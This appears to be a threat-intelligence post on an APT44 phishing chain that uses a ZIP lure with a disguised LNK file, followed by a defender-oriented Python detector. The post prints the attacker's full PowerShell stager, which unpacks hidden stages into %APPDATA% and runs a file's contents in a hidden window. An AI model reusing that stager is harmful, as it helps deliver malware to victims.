A multi-stage infection chain starts from a malicious ZIP archive named Iskhod_7582_Predstavlenie_na_naznachenie.zip (a Russian-language lure name, roughly "nomination for appointment"). The campaign, attributed to the Russian state-sponsored group APT44 (Sandworm), relies on deceptive file naming and a chained PowerShell one-liner that hides behind meaningless variable names and abbreviated cmdlet parameters rather than encoding, which is enough to slip past string-matching defenses that look for the full cmdlet and parameter names.
The attack begins with a phishing email containing the ZIP archive. Inside, users find what appears to be a PDF document but is actually a Windows Shortcut (LNK) file.
The Chain of Infection:
Deceptive LNK: The user double-clicks the shortcut, which carries a Microsoft Edge icon so that it passes for a document.
PowerShell Pivot: The LNK launches powershell.exe with a command that first runs where.exe /r against the user's profile to locate the original ZIP archive, since the shortcut cannot know where the archive was saved or unpacked.
Hidden Staging: Expand-Archive unpacks that archive into %APPDATA%\uuidPeriod. The next stage sits inside it as a file called employeeTrigger in a folder named $RECYCLE.BIN, a name chosen so that someone browsing the directory mistakes it for the system's recycle bin. That file is renamed with a .zip extension and expanded in turn into %APPDATA%\outlook.
Final Payload: The contents of a file named currentSessionTrigger are read with Get-Content and handed as the argument to a second powershell.exe started with a hidden window; according to the report, this stage establishes a connection to the attacker's infrastructure.
Malicious Command Execution
The LNK's target is powershell.exe with the following command line, reflowed here one statement per line. As reproduced, the two path assignments lack the + string-concatenation operator, without which PowerShell would reject the line; it is restored below.
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    $firstSummaryTitle=(where.exe /r $env:USERPROFILE 'Iskhod_7582_Predstavlenie_na_naznachenie.zip') | select -First 1;
    $totalValueThreshold=$firstSummaryTitle.Trim();
    Expand-Archive $totalValueThreshold -D $env:APPDATA\uuidPeriod;
    $totalValueThreshold=$env:APPDATA+'\uuidPeriod\$RECYCLE.BIN\employeeTrigger';
    $permanentLicenseRate=$totalValueThreshold+'.zip';
    ren $totalValueThreshold -N $permanentLicenseRate;
    Expand-Archive $permanentLicenseRate -D $env:APPDATA\outlook;
    $mainDataType=gc $env:APPDATA\outlook\currentSessionTrigger;
    Start-Process -Wi Hidden powershell $mainDataType
Reading notes for defenders: PowerShell binds any unambiguous parameter prefix, so -D is -DestinationPath, -N is -NewName and -Wi is -WindowStyle; ren is the built-in alias for Rename-Item, gc for Get-Content and select for Select-Object. The attacker writes where.exe explicitly because a bare where in PowerShell resolves to Where-Object. The staging path is in single quotes, so $RECYCLE.BIN is a literal directory name, not a variable. Detection content that matches only on the full cmdlet and parameter names will miss this chain; match on the abbreviated forms as well, or on the behaviour (archive expansion into %APPDATA% followed by a hidden child powershell whose arguments come from a file).
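As an added example, not part of the original post or of any published detection for this campaign, the Python below scores a process-creation command line against the tells of the chain above. Instead of grepping for full names it resolves PowerShell parameter prefixes (-D, -N, -Wi) and aliases (ren, gc) the way the interpreter does, which is what keeps it from being bypassed by the abbreviations. The malicious sample is the command above with the + operators restored; the two benign samples, the indicator names, the parameter-name subset and the threshold of three distinct indicators are all assumptions of this example.

```python
import re
from dataclasses import dataclass

# Subset of the real parameter names for the cmdlets the chain uses (assumption: enough
# for these samples). PowerShell binds any unambiguous prefix, so the detector must too.
CANONICAL_PARAMS = {
    "expand-archive": ["Path", "LiteralPath", "DestinationPath", "Force", "PassThru"],
    "rename-item": ["Path", "LiteralPath", "NewName", "Force", "PassThru"],
    "start-process": ["FilePath", "ArgumentList", "WindowStyle", "Wait",
                      "WorkingDirectory", "Verb", "NoNewWindow", "PassThru"],
}
# Built-in aliases the sample leans on. A bare "where" would be Where-Object, hence where.exe.
ALIASES = {"ren": "rename-item", "rni": "rename-item", "gc": "get-content", "cat": "get-content"}
KNOWN = set(CANONICAL_PARAMS) | {"get-content", "where.exe"}
TOKEN_RE = re.compile(r"""'[^']*'|"[^"]*"|\S+""")


def expand_param(cmdlet, prefix):
    """Resolve a prefix like PowerShell: exact name wins, else a unique prefix, else None."""
    names, p = CANONICAL_PARAMS.get(cmdlet, []), prefix.lower()
    exact = [n for n in names if n.lower() == p]
    if exact:
        return exact[0]
    cands = [n for n in names if n.lower().startswith(p)]
    return cands[0] if len(cands) == 1 else None


def split_statements(cmdline):
    """Split on ';' outside single or double quotes."""
    out, cur, quote = [], [], None
    for ch in cmdline:
        if quote:
            cur.append(ch)
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
            cur.append(ch)
        elif ch == ";":
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return [s for s in out if s]


def find_cmdlet(toks):
    """First recognised command in a statement, seen through a '$var=(' assignment prefix."""
    for i, t in enumerate(toks):
        name = t.split("=", 1)[-1].lstrip("(").lower()
        name = ALIASES.get(name, name)
        if name in KNOWN:
            return name, i
    return None, -1


def bound_params(toks, start, cmdlet):
    """Map each -Prefix (resolved to its full name) to the value token after it."""
    out = {}
    for i in range(start + 1, len(toks)):
        if toks[i].startswith("-") and len(toks[i]) > 1:
            out[expand_param(cmdlet, toks[i][1:]) or toks[i]] = toks[i + 1] if i + 1 < len(toks) else ""
    return out


@dataclass
class Finding:
    name: str
    detail: str


def analyze(cmdline):
    """Return the chain indicators present in one PowerShell command line."""
    findings, gc_vars = [], set()  # gc_vars: variables filled by Get-Content
    for stmt in split_statements(cmdline):
        toks = TOKEN_RE.findall(stmt)
        cmdlet, idx = find_cmdlet(toks)
        if cmdlet == "where.exe" and "/r" in toks and "$env:userprofile" in stmt.lower():
            findings.append(Finding("locate_carrier", "where.exe /r walks the profile for the carrier archive"))
        elif cmdlet == "expand-archive":
            dest = bound_params(toks, idx, cmdlet).get("DestinationPath", "")
            if "appdata" in dest.lower():
                findings.append(Finding("expand_to_appdata", f"Expand-Archive into {dest}"))
        elif cmdlet == "rename-item":
            new = bound_params(toks, idx, cmdlet).get("NewName")
            if new:
                findings.append(Finding("rename_stage", f"staged file renamed to {new}"))
        elif cmdlet == "get-content" and "=" in toks[idx]:
            gc_vars.add(toks[idx].split("=", 1)[0].lower())
        elif cmdlet == "start-process":
            params = bound_params(toks, idx, cmdlet)
            rest = [t.lower() for t in toks[idx + 1:]]
            if params.get("WindowStyle", "").lower() == "hidden" and any(t.startswith("powershell") for t in rest):
                findings.append(Finding("hidden_powershell", "child powershell started with -WindowStyle Hidden"))
            if any(t in gc_vars for t in rest):
                findings.append(Finding("exec_file_contents", "Start-Process argument is text read from a file"))
    if re.search(r"\$RECYCLE\.BIN", cmdline, re.IGNORECASE):  # single-quoted, so a literal dir name
        findings.append(Finding("recycle_bin_path", "faux $RECYCLE.BIN staging folder"))
    return findings


def is_suspicious(cmdline, threshold=3):
    """Assumed threshold: three or more distinct indicators flags the command line."""
    return len({f.name for f in analyze(cmdline)}) >= threshold


# Constructed samples: the campaign command (+ operators restored) and two benign admin lines.
MALICIOUS_CMD = (
    r"$firstSummaryTitle=(where.exe /r $env:USERPROFILE 'Iskhod_7582_Predstavlenie_na_naznachenie.zip') | select -First 1;"
    r"$totalValueThreshold=$firstSummaryTitle.Trim();Expand-Archive $totalValueThreshold -D $env:APPDATA\uuidPeriod;"
    r"$totalValueThreshold=$env:APPDATA+'\uuidPeriod\$RECYCLE.BIN\employeeTrigger';"
    r"$permanentLicenseRate=$totalValueThreshold+'.zip';ren $totalValueThreshold -N $permanentLicenseRate;"
    r"Expand-Archive $permanentLicenseRate -D $env:APPDATA\outlook;"
    r"$mainDataType=gc $env:APPDATA\outlook\currentSessionTrigger;Start-Process -Wi Hidden powershell $mainDataType"
)
BENIGN_CMDS = [
    r"Expand-Archive C:\Users\bob\Downloads\tools.zip -DestinationPath C:\Tools",
    r"where.exe /r $env:USERPROFILE report.docx | select -First 1",
]

if __name__ == "__main__":
    for cmd in [MALICIOUS_CMD] + BENIGN_CMDS:
        hits = analyze(cmd)
        print(("ALERT" if is_suspicious(cmd) else "ok   "), len(hits), "indicator(s):", cmd[:60])
        for f in hits:
            print("   ", f.name + ":", f.detail)
```

The benign where.exe line scores one indicator and the benign Expand-Archive none, so the threshold is what separates an administrator unpacking a tool from this chain; tune it against your own baseline of command lines before deploying, and feed it the Sysmon event 1 or 4688 command line rather than the script block text, since the LNK never writes a .ps1 to disk.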
Hash (MD5, 32 hex characters; the post does not say whether it covers the ZIP, the LNK or a later stage):
2156c270ffe8e4b23b67efed191b9737
#CyberSecurity #APT44 #Sandworm #MalwareAlert #ThreatIntel